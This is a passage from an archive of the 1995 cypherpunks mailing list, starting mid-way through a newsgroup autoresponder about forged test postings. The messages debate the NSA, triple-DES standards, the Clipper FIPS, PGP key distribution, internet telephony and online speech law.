3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: cass.ma02.bull.com!steamer.clam.com!newsie.dmc.com!grapevine.lcs.mit.edu!uhog.mit.edu!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 18:53:11 PST
To: cypherpunks@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <9502140251.AA28439@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Yahoo!

> From: Jack Repenning <jackr@dblues.engr.sgi.com>
>         In a November letter to committee members, the NSA
>         threatened to prevent the export of triple- DES, citing
>         existing US law and potential threats to national
>         security (see attached NSA letter).
> Oh, no, surely not.  There must be some misunderstanding here -
> they *promised* they wouldn't block export of non-Clipper
> things.  They wouldn't lie!

There's already some extra slack in the law and the official policy
for exporting encryption for use in banking; the NSA could get around it
by asking the banking regulators to impose some sort of Key Forfeiture nonsense,
which wouldn't lose much privacy since most banks are already
pretty cooperative about such things.

On the other hand, banks are rich enough to hire some off-shore programmer 
to write triple-DES implementations, given the current protocols,
as well as to lobby CONgress or the administration to keep the NSA in line.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 19:09:06 PST
To: pcassidy@world.std.com
Subject: Re:  What *is* the power of the FIPS
Message-ID: <9502140305.AA28564@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> -	QUESTION: Just what is the power of the FIPS outside of the 
> interop issues in sending stuff back and forth from federal agencies?

The basic purpose of a FIPS is to instruct governemnt agencies
on what kinds of equipment/software they should buy.
Some FIPSs are mandatory, but most are pretty optional.
However, in this case, the purpose is basically propaganda -
the NIST can set standards, and can announce "Hey, this is standard",
and even try to get other government agencies to buy lots and
lots of Clipperphones.

The so-called FIPS for Clipper was a horrendous abuse of the FIPS process;
I took advantage of my 10 years as a defense contractor to flame out the
proposed spec in great detail.  I don't think I've still got my critique,
but essentially I contended than the proposed "Escrowed Encryption Standard"
didn't describe escrow, didn't specify encryption, and wasn't a standard....
It was fun, if you can do that sort of thing and not inhale :-)

It wasn't escrow, because the functions it describes aren't escrow,
and it doesn't mandate that they be used in a way that performs
escrow functions using the functions it does perform.
It didn't specify an encryption algorithm.
It wasn't an implementable standard, since it didn't contain enough
information for a user agency to specify an equipment design ("ask the NSA" 
just _doesn't_ rate), or for a vendor to validate whether an equipment design
is compliant, or for a user to tell if it's working properly.
From the commentary around the final FIPS, which differed in some detail
from the draft FIPS, it looks like most of the public comments were about
the political issues, but a couple of changes appeared to be responses to
technical details from the public, including things I'd flamed them about.
I don't know how positive I feel about that .....

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Mon, 13 Feb 95 19:11:24 PST
To: eric@remailer.net
Subject: ref on crypto formalism
Message-ID: <199502140310.TAA23087@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric,

I dug out one of the references I was thinking of when you were
talking last saturday. A summary of the introduction would go:

"We describe a theory of authentication and a system that implements
it. Our theory is based on the notion of principal and a "speaks for"
relation between principals. A simple principal either has a name or is a
communication channel; a compound principal can express an adopted role
or delegation of authority. [...] We use the theory to explain
many existing and proposed mechanisms for security [...]"

So anyway, although I haven't read the whole thing in depth, it seems
to me a reasonnable way to reason about complex security setups
to make decisions about them (including automatically).

%A Butler Lampson
%A Martin Abadi
%A Michael Burrows
%A Edward Wobber
%T authentication in distributed systems: theory and practice
%J Operating Systems Review (ACM SIGOPS Review)
%J Proceedings of the 13th ACM symposium on operating systems principles
%C Pacific Grove, CA
%D Oct. 13-16 1991
%V 25
%N 5
%P 165-182
%K transitive authentication, operating systems, DES, RSA, security,
channel, RPC, remote procedure calls, public key encryption, name
lookup, groups, access control, delegation, revocation, principals

I'm pretty sure I saw somewhere a companion paper titled something
like "An algebra of authentication"... hmmm  maybe even in CACM...
[...15 minutes later...] Unfortunately some of my CACMs are in hiding
and not properly indexed... It was work done at DEC SRC in Palo Alto,
there must be some research reports too.

If somebody has refs for any of these, it would be great if you'd
post them.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Mon, 13 Feb 95 19:11:53 PST
To: cypherpunks@toad.com
Subject: Zimmerphone, IPhone, NetPhone, Maven...
Message-ID: <v03001403ab65cd6a5876@[140.174.229.219]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 2/13/95, usviszpz@ibmmail.com wrote:

>For those for whom this is already old news, I would like to ask: any idea if
>this technology is related in any way to VoicePGP? If not, any thoughts on the
>development ramifications of this for VoicePGP?

This is not related in any way to VoicePGP (which PRZ calls PGPFone and I
call the Zimmerphone).  On the CU-SeeMe discussion mailing list we've been
hashing out the performance of the costware IPhone (Windoze) and NetPhone
(Mac), and the freeware Maven (Mac).  They all suck less over 14.4.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Mon, 13 Feb 95 16:12:14 PST
To: cypherpunks@toad.com
Subject: What *is* the power of the FIPS
Message-ID: <Pine.3.89.9502131927.B13826-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Friends,
-	My editor from the Covert Action Quarterly called with a question 
on a piece I've authored on the NSA's involvement in the development of 
the digital telephony bill. I animated the characters and campaign 
strategies in this narrative common to the clipper and DT initiatives. In 
that, taking about Clipper I mentioned its rise as a FIPS, etc. 
-	QUESTION: Just what is the power of the FIPS outside of the 
interop issues in sending stuff back and forth from federal agencies?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bwern@jax.jaxnet.com (Ben Wern)
Date: Mon, 13 Feb 95 16:19:24 PST
To: cypherpunks@toad.com
Subject: Excel 5 Encryption
Message-ID: <199502140019.TAA23023@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings one and all,

I was wondering if anyone out there has played with or 'broken' Microsloths
encryption, especially in it's Excel from?

The story goes like this: A good friend of mine has an executive who stored
a lot of data in excel, with his own password. He has died, and the
company would very much like to get ahold of that corporate data. Microsoft
has chuckled politely at helping them (they're a rather large company), and
my friend has approached me... I don't have any experience with Microsoft
encryption.. but I know that the likes of WP can be broken, so I was
wondering if something similar to the cracks of that. 

ANY thoughts, comments, annencdotes, etc, etc. would be greatly appriciated.
I'll post a summary to the list, if you send privatly. 

Danke,

Ben Wern
(Hopefully this satisfies enough of the Cypherpunks-related content to avoid
scorch marks... :) )

bwern@jax.jaxnet.com
bwern@pathtech.com 
bwern@unf6.cis.unf.edu

PGP Key Available by Request! 
PGP mail gets preferred treatment!
Ask for it by name!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 16:31:45 PST
To: cypherpunks@toad.com
Subject: Re: What *is* the power of the FIPS
Message-ID: <v01510101ab6566ac8d4d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>-       QUESTION: Just what is the power of the FIPS outside of the
>interop issues in sending stuff back and forth from federal agencies?

Eh? Say again?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 19:42:42 PST
To: cypherpunks@toad.com
Subject: Distributed Key Service for PGP (was: why pgp sucks)
Message-ID: <9502140340.AA28899@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
> >Doesn't having some kind of central record of keys go against
> >the principle of PGP?  
> 
> The only "principle" of which I'm aware (and particularly interested
> in supporting) is that of having widely fielded, useful and strong
> privacy and authentication tools that work properly and transparently.
> That means, among a great many other things, flexible protocols
> and tools that support remote key distribution services.

Another main principle of PGP is that it _has_ to be able to work
in a decentralized fashion, so it's usable by
> the civilizing forces of Anarchy (PGP?)
even if the most common uses are in the centralized wired real-world.

Perry and other write:
[ lots of things about the need for distributed scalable key servers ]
[ particularly the numeric-only IDs. ]
There are two main times you need to get PGP keys -
encrypting a message to someone, and validating a signature from someone.

The former can be distributed easily enough - use something DNS-like
to serve keys for joe_user@foo.bar.com, and add them to your local
keyring if they're not there (possibly with temporary keyrings,
if that's easy enough on PGP version N.) 
Fetching keys needs to be a separate tool from PGP anyway,
since PGP should be general enough to work on wired and unwired systems,
with different protocols and APIs for using the available networks.
(And of course, the fetched keys need to be validated using web_of_trust
or whatever, adding yet another step.)  Sounds like a job for a shell...

The latter problem is more difficult - partly PGP's fault, but partly 
because the underlying problem is harder.  Signed documents _may_
arrive from keyids not on the keyservers, whether they're from
non-wired users, users who wish to remain pseudonymous,
one-or-two-use keys, etc....  What PGP can be blamed for, which will
hopefully be addressed in version 3.x, is that it's possible to have
collisions in the abbreviated key_ids, especially for the optional
short key_ids that have been requested as an added feature for people
who _very strongly_ want to remain anonymous.
(There have already been collisions in the 24-bit key_ids,
and it's been shown that it's possible to generate arbitrary key_ids
if you _want_ to cause a collision, as well as birthday-problem 
probabilities of random collisions.)

One way to address it is to make it easy to loop through a bunch
of keys with the same key_id, which is a bit tough given PGP's current
MS-DOS-like interface.  Another way is out-of-band attachment of the
user_id with the message, followed by DNS-like lookup, or attachment of
the signature key with the message, accompanied by a lookup to validate it.

As Matt said, there's a lot of policy-vs-mechanism issues here;
PGP version 3.0 will have some library support that makes it
easier to build some of these things.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 21:17:41 PST
To: cypherpunks@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <199502140518.VAA22900@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One is forced to wonder at the sort of person that can with a straight
> face argue that on the one hand an algorithm is cryptographically
> unsound, while at the same time posing a threat to national security.
> 

A lawyer, of course ... ;-}


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 17:12:35 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <199502140114.UAA17825@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


CDT writes:
> The NSA's efforts to push the adoption the Clipper/Skipjack 
> government-escrowed encryption scheme encountered a major 
> setback earlier this month with the decision by the 
> Accredited Standards Committee X9 to proceed with the 
> development of a data security standard based on triple-DES.    
> 
> The ASC X9 committee is responsible for setting data security 
> standards for the US banking and financial services 
> industries.

Are the minutes of the deliberations of X9, in complete or digest form,
available to the public anywhere ? It would be useful to get a sense of how
close the vote was, whose representatives voted which way, and the arguments
the members found most compelling in reaching their decision. We need to
gather as much feedback as possible, in order to determine which strategies
are liable to be effective in the future. The answers may not come as a
surprise, but confirmation of our suspicions would be nice.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 21:17:47 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502140518.VAA22903@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



One of the problems commenting on long thoughtful posts is the number 
of hooks, and limiting oneself to just a few.

	[delete lots of interesting stuff]

> 
> ... After all, the Soviets
> couldn't stop samizdats, the Chinese couldn't stop fax machines, and
> the Americans can't stop drug use, so what hope is there in
> controlling modems, crypto, cellular phones, satellites, Web links,
> stegonography, terabytes of data flowing unobstructed across borders,
> and so on. Just to "stop the Net" would disrupt the entire financial
> system, which not even Clinton or the next (Republican) President
> would be tempted to do....they might as well launch a nuclear war as
> try to shut down this "anarchic" ( = high dimensionality) system.
> 

Well, I certainly hope so.  But let's remember Poland in 1979, where 
"they" were desperate enough to shut down the entire phone system.  
It gained them only an extra 10 years of control, but it cost the 
Poles a *lot* of misery.

But "samizdat" raises an interesting economic issue around security.  
The Soviets paid just enough attention to the circulation of 
hand-written or typed copies to make sure people spent a lot of time 
and energy at it -- time and energy not spent on more obviously 
dangerous activity.   Compare the volume of Solzenhitsen's output 
before and after exile [let's not debate quality].  That didn't mean 
samizdat wasn't subversive and long-term dangerous -- but it was very 
expensive and absorbing to dissidents and potential dissidents.

But that's the situation cypherpunks [and friends :] want to put our 
hypothetical eavesdroppers [government or corporate] in.  Not exactly 
harmless, but spending a lot of time and energy being concerned with 
the chasing multiple carbon copies of samizdat novellas.


> 
> * Alternative Nets, like FIDONet, are often lost in the discussion of
> "the Net," but perhaps we should take much greater interest in these
> alternatives. They make a crackdown harder, they lessen the dangers of
> a single-point attack, and they provide "genetic diversity" for
> building future Nets. (I'm not saying Cypherpunks have the time,
> expertise, or incentive to work on this, but just reminding folks that
> the Internet is not the end all and be all...)
> 

I find that techno-illiterate Greens have very little trouble 
understanding FIDONet -- it's the kind of small-scale organizing 
within larger networks that a lot of progressive activity has always 
followed.  They find it very hard to believe that other kinds of 
techie nets are really secure in the long run.  It is, in fact, the 
level of activity that the Poles reverted to without the phone 
system ...

> Personally, I think there are fewer long essays and analyses for the
> same reason there are fewer large predators than grass-munching
> herbivores.
> 
> --Tim May
> 

Geez, I have enough trouble getting card-carrying Greens to use 
and/or develop good ecological metaphors without some 
crypto-anarcho-libber punk muscling into the territory!  ;-)


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Mon, 13 Feb 95 18:07:49 PST
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132259.AA14841@vail.tivoli.com>
Message-ID: <9502140207.AA22303@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally originally said the following...
> 
> 
> gnu@toad.com writes:
>  > In their November letter to X9 committee members, the NSA 
>  > attempted to undermine the attractiveness of triple-DES by 
>  > arguing that it is cryptographically unsound, a potential 
>  > threat to national security, and would not be exportable 
>  > under US law.
> 
> One is forced to wonder at the sort of person that can with a straight
> face argue that on the one hand an algorithm is cryptographically
> unsound, while at the same time posing a threat to national security.
Just playing Devil's Advocate, but maybe he's saying that it's
so faulty that trusting banking communications to it would be a
threat to national security...  You know, it's so faulty it's
dangerous.. Kinda like Dan Qyale for president. *8)

-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 18:18:30 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <199502140218.VAA03104@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Are they (CNN) going to re-air the discussion? I wasn't able to see it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 13 Feb 95 18:28:51 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <ojDo69v0Eyt50xSXkP@nsb.fv.com>
Message-ID: <9502140226.AA11393@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 13 Feb 1995 06:24:57 -0500 (EST)
    From: Nathaniel Borenstein <nsb@nsb.fv.com>
    
    Excerpts from mail: 12-Feb-95 Re: MIME based remailing co.. Rick
    Busdiecker@lehman.c (1544)
    
    >     Well, I have no idea why you think that MIME is an "atrocity" or
    >     "slime", but it is perfectly clear that you have no idea what it
    >     actually *is*, since "X-" headers have nothing whatsoever to do with
    >     MIME.  The "X-" headers are defined by RFC 822, which has been the
    >     standard for Internet mail formats since 1982.
    
    > You base a large conclusion on a small piece of data in combination
    > with some poor duduction.  Unless you are claiming that MIME violates
    > RFC 822 with respect to the handling of X- headers you have made a
    > number of false claims in the paragraph above.
    
    A very interesting claim.  Care to tell me what my "false claims" are,
    or is it a secret?

One is your claim that ``"X-" headers have nothing whatsoever to do
with MIME.''  This was in response to my suggestion that such headers
were MIME-compliant.  As I said previously, unless you are claiming
that MIME violates the RFC which you referenced, then these headers
are MIME compliant, as I suggested, rather than completely seperated
from MIME as you have suggested.

The other is that I ``have no idea what [MIME] is''.  I may not know
as much as I should, by your judgement, however your claim is still
incorrect -- presumably you were more interested in being
inflammatory than accurate.  Not completely out of place here . . . .

Really, there was nothing very secretive about my previous or current
presentation of the problems with your claims.  For example, you might
note that the first one that I list is simply a rewording of the
message to which you most recently replied.  What was it that was
unclear the first time?  Or *are* you suggesting the MIME violates RFC
822?  Or perhaps I'm just missing something subtle in your reasoning.
If so, could you elaborate?

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Mon, 13 Feb 95 19:35:13 PST
To: cypherpunks@toad.com
Subject: Re: The NSA
In-Reply-To: <199502132058.PAA01939@bb.hks.net>
Message-ID: <qV1GlOwscsyI077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199502132058.PAA01939@bb.hks.net>,
anonymous-remailer@xs4all.nl (Name withheld on request) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>- ----- BEGIN PGP SIGNED MESSAGE HERE ----
>An entity purporting to be Mike Duvos writes:
>
>> Such a situation does not apply solely to the NSA.  There are,
>> for instance, secret lodges of French mystics who devote
>> themselves to higher mathematics, absorb everything the open
>> community produces, and rarely publish anything or draw attention
>> to themselves.  They solve problems, write secret manuscripts,
>
>Actually, the French group is a subsidiary of our Bavarian operation.
>However, "centuries" is, well, somewhat inaccurate, though the 
>mathematician who first mentioned our existence about that time has
>since recanted after a visit from the Elders...
>
>				A.W.

Is that sort of thing like being paid a visit by "The Enforcers" of "Forever
Knight" fame? :>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBL0AYh3BFBj7pSNyhAQH0MAf/URevPL9zB8d40zwAozvOhsgwG5pU0eVv
QOizn1SXgc75MdiWCiyUk7SpDG+vCpDSsmuIi/zUFiyxAxEmNSatGjtDQ3oEHom3
i2D3cor1AlNw6vSEVk+l6u9JVIch1BLEU8aEjFKqmfcA1zHFGN8Tm3+fCqkCKE13
0fdjwNMtJMcAMRAzefeFNM1oWvcmW8f17YFPMaGmKdfUvFEOuX5t8OBsAaRl3jWe
cop+Tobh0IVsYYzyKJRecNKnVqx8Jtc0FpdrFAsvV59ad2mx9ltt9S5uT2r2Pivk
kTbhR0TQN3Tt5G7WQth0wXbEpfIx1TbRu/rj6ezNvG9pzh8pfufQSQ==
=ygze
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 13 Feb 95 18:57:54 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950213215125.2820B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 13 Feb 1995, Samuel Kaplin wrote:

> Senator Exon was much more convincing than Mr. Rotenberg. :( Why didn't
> EPIC field someone with better debating skills? A sellout was offered a 
> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
> interested in the issue. This is not a good omen. The perseption left in 
> my non-internet literate wife was that the INTERNET=smut. :(
> 

I assume that Rotenberg was trying to do one thing only which was to try 
and get Exon to state that his bill did not cover ISPs.  He succeeded.  
He was not trying in 5 minutes to score debating points along the lines 
of "pornography, smut, indecency, sex, violence, rapine, and slaughter 
are perfectly legal so long as they do not rise to the level of legal 
obscenity."  That's just the sort of argument that gets the audience to 
think you're nuts and ignore you.  

If the bill doesn't cover ISPs, it is meaningless.  He never actually 
*said* he'd work with Exon.  You have to be very careful on these shows.  
He could, perhaps, have done a little better, but I detected no sellout.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 13 Feb 95 21:11:56 PST
To: usviszpz@ibmmail.com
Subject: Re: WSJ article on Internet Telephony
In-Reply-To: <9502131947.AA17236@toad.com>
Message-ID: <m0reFXx-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> {The producers of Internet Phone are listed as VocalTec in Tel Aviv, with
> offices in Northvale, NJ; the software is currently $49 (although a demo
> version allowing unlimited 3-min calls is free) and currently requires a 14.4
> kps modem with a Windows 486, sound card & microphone. No Email address for the
> company was given.)

If memory serves, there are several implementations of this technology for
Windows and UNIX - no need to pay $$$...

One implementation is called mtalk, another is called ifone - they are both
for linux.  I think I found them on sunsite.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 14 Feb 95 01:02:39 PST
To: cypherpunks@toad.com
Subject: Re: Laws, Feds, & the Internet
In-Reply-To: <m0rdBe4-000k50C@mailbox.mcs.com>
Message-ID: <Ki4GlyczB8cA075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0rdBe4-000k50C@mailbox.mcs.com>, 
dls@mcs.com (David Sallach) wrote:

[Rich Dutcher wrote:]

> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>         The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  

And hard on the heels of the ratification of the Bill of Rights came the
Alien and Sedition Acts.  The Founders were so distressed by the size of
the space for free expresion they had allowed to be created that they
took immediate steps to limit it.

It is well to remember that the Bill of Rights was a bone thrown by the
Founders (that is, the Federalists) to sweeten the bitter pill of the
process of centralizing government power.  An afterthought, actually.

> > . . . "They" have never liked "free" speech ... :-(
> 
>         Invoking poitically 'correct' stereotypes does not strengthen your
> argument.

Arguing _ad_hominem_ doesn't strengthen yours.

   Alan Bostick           | The nice thing about quotes is that they give   
   abostick@netcom.com    | a nodding acquaintance with the originator
finger for PGP public key | which is often socially impressive.
Key fingerprint:          |         Kenneth Williams
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBL0BNnuVevBgtmhnpAQEe7wL/aNjOHyflJHfcRrHdxa73Xt9Hu8eTD4kx
+gWQpMpeJHLhQk+Gey3epbqXDkjT0YOFI3xUtcjotGRnHhisIbhPztYOCZBxhSLE
WkozOBCZpz2t6a+Z3cPYRH/jBk7aCWBd
=XDZA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Mon, 13 Feb 95 19:32:40 PST
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SUN.3.91.950213215125.2820B-100000@panix.com>
Message-ID: <Pine.LNX.3.91.950213223336.16909A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Duncan Frissell wrote:

> If the bill doesn't cover ISPs, it is meaningless.  He never actually 
> *said* he'd work with Exon.  You have to be very careful on these shows.  
> He could, perhaps, have done a little better, but I detected no sellout.

Exon can say whatever he wants. Read the bill. There's no "except for 
ISPs" in there anywhere you know.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 13 Feb 95 22:41:38 PST
To: cypherpunks@toad.com
Subject: Internationalism no panacea
Message-ID: <199502140641.WAA18400@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Two recent news stories cast doubt on the principle that the international
aspects of the nets will prevent governments from enforcing their laws
"in cyberspace".

One is the possible trade war between the U.S. and China over that
country's continued support of intellectual property piracy, in video,
audio, and computer software.  Apparently the U.S. is very serious about
imposing sanctions because of this problem, while China is threatening
retaliation.  It is quite amazing to me to see these two big countries
going to the mat over "just bits" but as we know bits are big business
now.

Think of our recent discussions of putting data havens offshore.  If the
U.S. is willing to turn the screws on a nuclear power like China, how
much protection will some dinky Caribbean country offer when people make
Windows 96 and Jurassic II available for download for $5 ecash?  IMO the
trend is going to be toward international enforcement efforts, a general
movement towards uniform information laws.

The other story related to the idea that individuals can evade laws by
moving from country to country as tourists.  Apparently in the recent
budget bill was a little-publicized change in the tax treatement of
people who renounce their U.S. citizenship.  (The change would be retroactive
to last week and was kept quiet until then to prevent a surge of people
leaving.)  Since you earned all your assets as a citizen of the U.S.,
naturally when you leave the grasp of that country you will not longer
get to take it all with you.  Instead you will apparently have to pay
capital gain taxes on some substantial fraction of your assets.

The article I read went on to discuss the problems many countries are
having with people playing citizenship games.  The implication was that
this may be just one step in a crackdown to close many of the loopholes
that allow people to travel under one flag or another.

My take on this is that human ingenuity is sufficient that there will
always be new loopholes found, and that a sufficiently energetic and
motivated person will probably be able to stay one step ahead of the
enforcers.  However, this will not be a lifestyle that can be turned into
a cookbook; as soon as some trick became widely known, the loophole would
be closed.  So this is something which will be available to an elite but
not to the masses.  Hence I don't see "perpetual tourism" as something
which will be a serious threat to government power.

My views are somewhat iconoclastic for this list; I don't see
cryptography as bringing about a libertarian/anarchist state.  I continue
to believe that the best and only way to achieve freedom for the mass of
people is to convince them that it is a good idea.  A small elite can and
will continue to be able to avoid many laws, and crypto will no doubt be
useful to them.  But IMO it is not going to change the shape of society.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBL0BQchnMLJtOy9MBAQGJaAH/WTtd0bYeqKy89AUOSaSdraxN7YNZ2z42
